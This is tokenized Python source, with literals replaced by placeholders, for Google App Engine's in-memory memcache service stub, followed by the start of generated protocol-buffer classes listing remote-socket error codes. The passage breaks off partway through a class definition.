<s> """<STR_LIT>""" <EOL> import logging <EOL> import time <EOL> from google . appengine . api import apiproxy_stub <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api . memcache import memcache_service_pb <EOL> from google . appengine . runtime import apiproxy_errors <EOL> MemcacheSetResponse = memcache_service_pb . MemcacheSetResponse <EOL> MemcacheSetRequest = memcache_service_pb . MemcacheSetRequest <EOL> MemcacheIncrementRequest = memcache_service_pb . MemcacheIncrementRequest <EOL> MemcacheIncrementResponse = memcache_service_pb . MemcacheIncrementResponse <EOL> MemcacheDeleteResponse = memcache_service_pb . MemcacheDeleteResponse <EOL> MAX_REQUEST_SIZE = <NUM_LIT:32> << <NUM_LIT:20> <EOL> class CacheEntry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , value , expiration , flags , cas_id , gettime ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( value , basestring ) <EOL> assert len ( value ) <= memcache . MAX_VALUE_SIZE <EOL> assert isinstance ( expiration , ( int , long ) ) <EOL> self . _gettime = gettime <EOL> self . value = value <EOL> self . flags = flags <EOL> self . cas_id = cas_id <EOL> self . created_time = self . _gettime ( ) <EOL> self . will_expire = expiration != <NUM_LIT:0> <EOL> self . locked = False <EOL> self . _SetExpiration ( expiration ) <EOL> def _SetExpiration ( self , expiration ) : <EOL> """<STR_LIT>""" <EOL> if expiration > ( <NUM_LIT> * <NUM_LIT:30> ) : <EOL> self . expiration_time = expiration <EOL> else : <EOL> self . expiration_time = self . _gettime ( ) + expiration <EOL> def CheckExpired ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . will_expire and self . _gettime ( ) >= self . expiration_time <EOL> def ExpireAndLock ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . will_expire = True <EOL> self . locked = True <EOL> self . _SetExpiration ( timeout ) <EOL> def CheckLocked ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . locked and not self . CheckExpired ( ) <EOL> class MemcacheServiceStub ( apiproxy_stub . APIProxyStub ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , gettime = time . time , service_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> super ( MemcacheServiceStub , self ) . __init__ ( service_name , <EOL> max_request_size = MAX_REQUEST_SIZE ) <EOL> self . _next_cas_id = <NUM_LIT:1> <EOL> self . _gettime = lambda : int ( gettime ( ) ) <EOL> self . _ResetStats ( ) <EOL> self . _the_cache = { } <EOL> def _ResetStats ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _hits = <NUM_LIT:0> <EOL> self . _misses = <NUM_LIT:0> <EOL> self . _byte_hits = <NUM_LIT:0> <EOL> self . _cache_creation_time = self . _gettime ( ) <EOL> def _GetKey ( self , namespace , key ) : <EOL> """<STR_LIT>""" <EOL> namespace_dict = self . _the_cache . get ( namespace , None ) <EOL> if namespace_dict is None : <EOL> return None <EOL> entry = namespace_dict . get ( key , None ) <EOL> if entry is None : <EOL> return None <EOL> elif entry . CheckExpired ( ) : <EOL> del namespace_dict [ key ] <EOL> return None <EOL> else : <EOL> return entry <EOL> def _Dynamic_Get ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> keys = set ( request . key_list ( ) ) <EOL> for key in keys : <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None or entry . CheckLocked ( ) : <EOL> self . _misses += <NUM_LIT:1> <EOL> continue <EOL> self . _hits += <NUM_LIT:1> <EOL> self . _byte_hits += len ( entry . value ) <EOL> item = response . add_item ( ) <EOL> item . set_key ( key ) <EOL> item . set_value ( entry . value ) <EOL> item . set_flags ( entry . flags ) <EOL> if request . for_cas ( ) : <EOL> item . set_cas_id ( entry . cas_id ) <EOL> def _Dynamic_Set ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> set_policy = item . set_policy ( ) <EOL> old_entry = self . _GetKey ( namespace , key ) <EOL> set_status = MemcacheSetResponse . NOT_STORED <EOL> if ( ( set_policy == MemcacheSetRequest . SET ) or <EOL> ( set_policy == MemcacheSetRequest . ADD and old_entry is None ) or <EOL> ( set_policy == MemcacheSetRequest . REPLACE and old_entry is not None ) ) : <EOL> if ( old_entry is None or <EOL> set_policy == MemcacheSetRequest . SET <EOL> or not old_entry . CheckLocked ( ) ) : <EOL> set_status = MemcacheSetResponse . STORED <EOL> elif ( set_policy == MemcacheSetRequest . CAS and item . for_cas ( ) and <EOL> item . has_cas_id ( ) ) : <EOL> if old_entry is None or old_entry . CheckLocked ( ) : <EOL> set_status = MemcacheSetResponse . NOT_STORED <EOL> elif old_entry . cas_id != item . cas_id ( ) : <EOL> set_status = MemcacheSetResponse . EXISTS <EOL> else : <EOL> set_status = MemcacheSetResponse . STORED <EOL> if set_status == MemcacheSetResponse . STORED : <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( item . value ( ) , <EOL> item . expiration_time ( ) , <EOL> item . flags ( ) , <EOL> self . _next_cas_id , <EOL> gettime = self . _gettime ) <EOL> self . _next_cas_id += <NUM_LIT:1> <EOL> response . add_set_status ( set_status ) <EOL> def _Dynamic_Delete ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for item in request . item_list ( ) : <EOL> key = item . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> delete_status = MemcacheDeleteResponse . DELETED <EOL> if entry is None : <EOL> delete_status = MemcacheDeleteResponse . NOT_FOUND <EOL> elif item . delete_time ( ) == <NUM_LIT:0> : <EOL> del self . _the_cache [ namespace ] [ key ] <EOL> else : <EOL> entry . ExpireAndLock ( item . delete_time ( ) ) <EOL> response . add_delete_status ( delete_status ) <EOL> def _internal_increment ( self , namespace , request ) : <EOL> """<STR_LIT>""" <EOL> key = request . key ( ) <EOL> entry = self . _GetKey ( namespace , key ) <EOL> if entry is None : <EOL> if not request . has_initial_value ( ) : <EOL> return None <EOL> if namespace not in self . _the_cache : <EOL> self . _the_cache [ namespace ] = { } <EOL> flags = <NUM_LIT:0> <EOL> if request . has_initial_flags ( ) : <EOL> flags = request . initial_flags ( ) <EOL> self . _the_cache [ namespace ] [ key ] = CacheEntry ( str ( request . initial_value ( ) ) , <EOL> expiration = <NUM_LIT:0> , <EOL> flags = flags , <EOL> cas_id = self . _next_cas_id , <EOL> gettime = self . _gettime ) <EOL> self . _next_cas_id += <NUM_LIT:1> <EOL> entry = self . _GetKey ( namespace , key ) <EOL> assert entry is not None <EOL> try : <EOL> old_value = long ( entry . value ) <EOL> if old_value < <NUM_LIT:0> : <EOL> raise ValueError <EOL> except ValueError : <EOL> logging . error ( '<STR_LIT>' <EOL> '<STR_LIT>' , key ) <EOL> return None <EOL> delta = request . delta ( ) <EOL> if request . direction ( ) == MemcacheIncrementRequest . DECREMENT : <EOL> delta = - delta <EOL> new_value = max ( old_value + delta , <NUM_LIT:0> ) % ( <NUM_LIT:2> ** <NUM_LIT:64> ) <EOL> entry . value = str ( new_value ) <EOL> return new_value <EOL> def _Dynamic_Increment ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> new_value = self . _internal_increment ( namespace , request ) <EOL> if new_value is None : <EOL> raise apiproxy_errors . ApplicationError ( <EOL> memcache_service_pb . MemcacheServiceError . UNSPECIFIED_ERROR ) <EOL> response . set_new_value ( new_value ) <EOL> def _Dynamic_BatchIncrement ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> namespace = request . name_space ( ) <EOL> for request_item in request . item_list ( ) : <EOL> new_value = self . _internal_increment ( namespace , request_item ) <EOL> item = response . add_item ( ) <EOL> if new_value is None : <EOL> item . set_increment_status ( MemcacheIncrementResponse . NOT_CHANGED ) <EOL> else : <EOL> item . set_increment_status ( MemcacheIncrementResponse . OK ) <EOL> item . set_new_value ( new_value ) <EOL> def _Dynamic_FlushAll ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> self . _the_cache . clear ( ) <EOL> self . _ResetStats ( ) <EOL> def _Dynamic_Stats ( self , request , response ) : <EOL> """<STR_LIT>""" <EOL> stats = response . mutable_stats ( ) <EOL> stats . set_hits ( self . _hits ) <EOL> stats . set_misses ( self . _misses ) <EOL> stats . set_byte_hits ( self . _byte_hits ) <EOL> items = <NUM_LIT:0> <EOL> total_bytes = <NUM_LIT:0> <EOL> for namespace in self . _the_cache . itervalues ( ) : <EOL> items += len ( namespace ) <EOL> for entry in namespace . itervalues ( ) : <EOL> total_bytes += len ( entry . value ) <EOL> stats . set_items ( items ) <EOL> stats . set_bytes ( total_bytes ) <EOL> stats . set_oldest_item_age ( self . _gettime ( ) - self . _cache_creation_time ) </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> if hasattr ( ProtocolBuffer , '<STR_LIT>' ) : <EOL> _extension_runtime = True <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ExtendableProtocolMessage <EOL> else : <EOL> _extension_runtime = False <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ProtocolMessage <EOL> class RemoteSocketServiceError ( ProtocolBuffer . ProtocolMessage ) : <EOL> SYSTEM_ERROR = <NUM_LIT:1> <EOL> GAI_ERROR = <NUM_LIT:2> <EOL> SSL_ERROR = <NUM_LIT:3> <EOL> FAILURE = <NUM_LIT:4> <EOL> PERMISSION_DENIED = <NUM_LIT:5> <EOL> INVALID_REQUEST = <NUM_LIT:6> <EOL> SOCKET_CLOSED = <NUM_LIT:7> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> SYS_SUCCESS = <NUM_LIT:0> <EOL> SYS_EPERM = <NUM_LIT:1> <EOL> SYS_ENOENT = <NUM_LIT:2> <EOL> SYS_ESRCH = <NUM_LIT:3> <EOL> SYS_EINTR = <NUM_LIT:4> <EOL> SYS_EIO = <NUM_LIT:5> <EOL> SYS_ENXIO = <NUM_LIT:6> <EOL> SYS_E2BIG = <NUM_LIT:7> <EOL> SYS_ENOEXEC = <NUM_LIT:8> <EOL> SYS_EBADF = <NUM_LIT:9> <EOL> SYS_ECHILD = <NUM_LIT:10> <EOL> SYS_EAGAIN = <NUM_LIT:11> <EOL> SYS_EWOULDBLOCK = <NUM_LIT:11> <EOL> SYS_ENOMEM = <NUM_LIT:12> <EOL> SYS_EACCES = <NUM_LIT> <EOL> SYS_EFAULT = <NUM_LIT> <EOL> SYS_ENOTBLK = <NUM_LIT:15> <EOL> SYS_EBUSY = <NUM_LIT:16> <EOL> SYS_EEXIST = <NUM_LIT> <EOL> SYS_EXDEV = <NUM_LIT> <EOL> SYS_ENODEV = <NUM_LIT> <EOL> SYS_ENOTDIR = <NUM_LIT:20> <EOL> SYS_EISDIR = <NUM_LIT> <EOL> SYS_EINVAL = <NUM_LIT> <EOL> SYS_ENFILE = <NUM_LIT> <EOL> SYS_EMFILE = <NUM_LIT> <EOL> SYS_ENOTTY = <NUM_LIT> <EOL> SYS_ETXTBSY = <NUM_LIT> <EOL> SYS_EFBIG = <NUM_LIT> <EOL> SYS_ENOSPC = <NUM_LIT> <EOL> SYS_ESPIPE = <NUM_LIT> <EOL> SYS_EROFS = <NUM_LIT:30> <EOL> SYS_EMLINK = <NUM_LIT> <EOL> SYS_EPIPE = <NUM_LIT:32> <EOL> SYS_EDOM = <NUM_LIT> <EOL> SYS_ERANGE = <NUM_LIT> <EOL> SYS_EDEADLK = <NUM_LIT> <EOL> SYS_EDEADLOCK = <NUM_LIT> <EOL> SYS_ENAMETOOLONG = <NUM_LIT> <EOL> SYS_ENOLCK = <NUM_LIT> <EOL> SYS_ENOSYS = <NUM_LIT> <EOL> SYS_ENOTEMPTY = <NUM_LIT> <EOL> SYS_ELOOP = <NUM_LIT> <EOL> SYS_ENOMSG = <NUM_LIT> <EOL> SYS_EIDRM = <NUM_LIT> <EOL> SYS_ECHRNG = <NUM_LIT> <EOL> SYS_EL2NSYNC = <NUM_LIT> <EOL> SYS_EL3HLT = <NUM_LIT> <EOL> SYS_EL3RST = <NUM_LIT> <EOL> SYS_ELNRNG = <NUM_LIT> <EOL> SYS_EUNATCH = <NUM_LIT> <EOL> SYS_ENOCSI = <NUM_LIT:50> <EOL> SYS_EL2HLT = <NUM_LIT> <EOL> SYS_EBADE = <NUM_LIT> <EOL> SYS_EBADR = <NUM_LIT> <EOL> SYS_EXFULL = <NUM_LIT> <EOL> SYS_ENOANO = <NUM_LIT> <EOL> SYS_EBADRQC = <NUM_LIT> <EOL> SYS_EBADSLT = <NUM_LIT> <EOL> SYS_EBFONT = <NUM_LIT> <EOL> SYS_ENOSTR = <NUM_LIT> <EOL> SYS_ENODATA = <NUM_LIT> <EOL> SYS_ETIME = <NUM_LIT> <EOL> SYS_ENOSR = <NUM_LIT> <EOL> SYS_ENONET = <NUM_LIT:64> <EOL> SYS_ENOPKG = <NUM_LIT> <EOL> SYS_EREMOTE = <NUM_LIT> <EOL> SYS_ENOLINK = <NUM_LIT> <EOL> SYS_EADV = <NUM_LIT> <EOL> SYS_ESRMNT = <NUM_LIT> <EOL> SYS_ECOMM = <NUM_LIT> <EOL> SYS_EPROTO = <NUM_LIT> <EOL> SYS_EMULTIHOP = <NUM_LIT> <EOL> SYS_EDOTDOT = <NUM_LIT> <EOL> SYS_EBADMSG = <NUM_LIT> <EOL> SYS_EOVERFLOW = <NUM_LIT> <EOL> SYS_ENOTUNIQ = <NUM_LIT> <EOL> SYS_EBADFD = <NUM_LIT> <EOL> SYS_EREMCHG = <NUM_LIT> <EOL> SYS_ELIBACC = <NUM_LIT> <EOL> SYS_ELIBBAD = <NUM_LIT> <EOL> SYS_ELIBSCN = <NUM_LIT> <EOL> SYS_ELIBMAX = <NUM_LIT> <EOL> SYS_ELIBEXEC = <NUM_LIT> <EOL> SYS_EILSEQ = <NUM_LIT> <EOL> SYS_ERESTART = <NUM_LIT> <EOL> SYS_ESTRPIPE = <NUM_LIT> <EOL> SYS_EUSERS = <NUM_LIT> <EOL> SYS_ENOTSOCK = <NUM_LIT> <EOL> SYS_EDESTADDRREQ = <NUM_LIT> <EOL> SYS_EMSGSIZE = <NUM_LIT> <EOL> SYS_EPROTOTYPE = <NUM_LIT> <EOL> SYS_ENOPROTOOPT = <NUM_LIT> <EOL> SYS_EPROTONOSUPPORT = <NUM_LIT> <EOL> SYS_ESOCKTNOSUPPORT = <NUM_LIT> <EOL> SYS_EOPNOTSUPP = <NUM_LIT> <EOL> SYS_ENOTSUP = <NUM_LIT> <EOL> SYS_EPFNOSUPPORT = <NUM_LIT> <EOL> SYS_EAFNOSUPPORT = <NUM_LIT> <EOL> SYS_EADDRINUSE = <NUM_LIT> <EOL> SYS_EADDRNOTAVAIL = <NUM_LIT> <EOL> SYS_ENETDOWN = <NUM_LIT:100> <EOL> SYS_ENETUNREACH = <NUM_LIT> <EOL> SYS_ENETRESET = <NUM_LIT> <EOL> SYS_ECONNABORTED = <NUM_LIT> <EOL> SYS_ECONNRESET = <NUM_LIT> <EOL> SYS_ENOBUFS = <NUM_LIT> <EOL> SYS_EISCONN = <NUM_LIT> <EOL> SYS_ENOTCONN = <NUM_LIT> <EOL> SYS_ESHUTDOWN = <NUM_LIT> <EOL> SYS_ETOOMANYREFS = <NUM_LIT> <EOL> SYS_ETIMEDOUT = <NUM_LIT> <EOL> SYS_ECONNREFUSED = <NUM_LIT> <EOL> SYS_EHOSTDOWN = <NUM_LIT> <EOL> SYS_EHOSTUNREACH = <NUM_LIT> <EOL> SYS_EALREADY = <NUM_LIT> <EOL> SYS_EINPROGRESS = <NUM_LIT> <EOL> SYS_ESTALE = <NUM_LIT> <EOL> SYS_EUCLEAN = <NUM_LIT> <EOL> SYS_ENOTNAM = <NUM_LIT> <EOL> SYS_ENAVAIL = <NUM_LIT> <EOL> SYS_EISNAM = <NUM_LIT> <EOL> SYS_EREMOTEIO = <NUM_LIT> <EOL> SYS_EDQUOT = <NUM_LIT> <EOL> SYS_ENOMEDIUM = <NUM_LIT> <EOL> SYS_EMEDIUMTYPE = <NUM_LIT> <EOL> SYS_ECANCELED = <NUM_LIT> <EOL> SYS_ENOKEY = <NUM_LIT> <EOL> SYS_EKEYEXPIRED = <NUM_LIT> <EOL> SYS_EKEYREVOKED = <NUM_LIT> <EOL> SYS_EKEYREJECTED = <NUM_LIT> <EOL> SYS_EOWNERDEAD = <NUM_LIT> <EOL> SYS_ENOTRECOVERABLE = <NUM_LIT> <EOL> SYS_ERFKILL = <NUM_LIT> <EOL> _SystemError_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:20> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:30> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:32> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:50> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:64> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:100> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> } <EOL> def SystemError_Name ( cls , x ) : return cls . _SystemError_NAMES . get ( x , "<STR_LIT>" ) <EOL> SystemError_Name = classmethod ( SystemError_Name ) <EOL> has_system_error_ = <NUM_LIT:0> <EOL> system_error_ = <NUM_LIT:0> <EOL> has_error_detail_ = <NUM_LIT:0> <EOL> error_detail_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def system_error ( self ) : return self . system_error_ <EOL> def set_system_error ( self , x ) : <EOL> self . has_system_error_ = <NUM_LIT:1> <EOL> self . system_error_ = x <EOL> def clear_system_error ( self ) : <EOL> if self . has_system_error_ : <EOL> self . has_system_error_ = <NUM_LIT:0> <EOL> self . system_error_ = <NUM_LIT:0> <EOL> def has_system_error ( self ) : return self . has_system_error_ <EOL> def error_detail ( self ) : return self . error_detail_ <EOL> def set_error_detail ( self , x ) : <EOL> self . has_error_detail_ = <NUM_LIT:1> <EOL> self . error_detail_ = x <EOL> def clear_error_detail ( self ) : <EOL> if self . has_error_detail_ : <EOL> self . has_error_detail_ = <NUM_LIT:0> <EOL> self . error_detail_ = "<STR_LIT>" <EOL> def has_error_detail ( self ) : return self . has_error_detail_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_system_error ( ) ) : self . set_system_error ( x . system_error ( ) ) <EOL> if ( x . has_error_detail ( ) ) : self . set_error_detail ( x . error_detail ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_system_error_ != x . has_system_error_ : return <NUM_LIT:0> <EOL> if self . has_system_error_ and self . system_error_ != x . system_error_ : return <NUM_LIT:0> <EOL> if self . has_error_detail_ != x . has_error_detail_ : return <NUM_LIT:0> <EOL> if self . has_error_detail_ and self . error_detail_ != x . error_detail_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_system_error_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . error_detail_ ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_system_error_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . error_detail_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_system_error ( ) <EOL> self . clear_error_detail ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_system_error_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . error_detail_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_system_error_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . system_error_ ) <EOL> if ( self . has_error_detail_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . error_detail_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_system_error ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_error_detail ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_system_error_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . system_error_ ) ) <EOL> if self . has_error_detail_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . error_detail_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksystem_error = <NUM_LIT:1> <EOL> kerror_detail = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AddressPort ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_port_ = <NUM_LIT:0> <EOL> port_ = 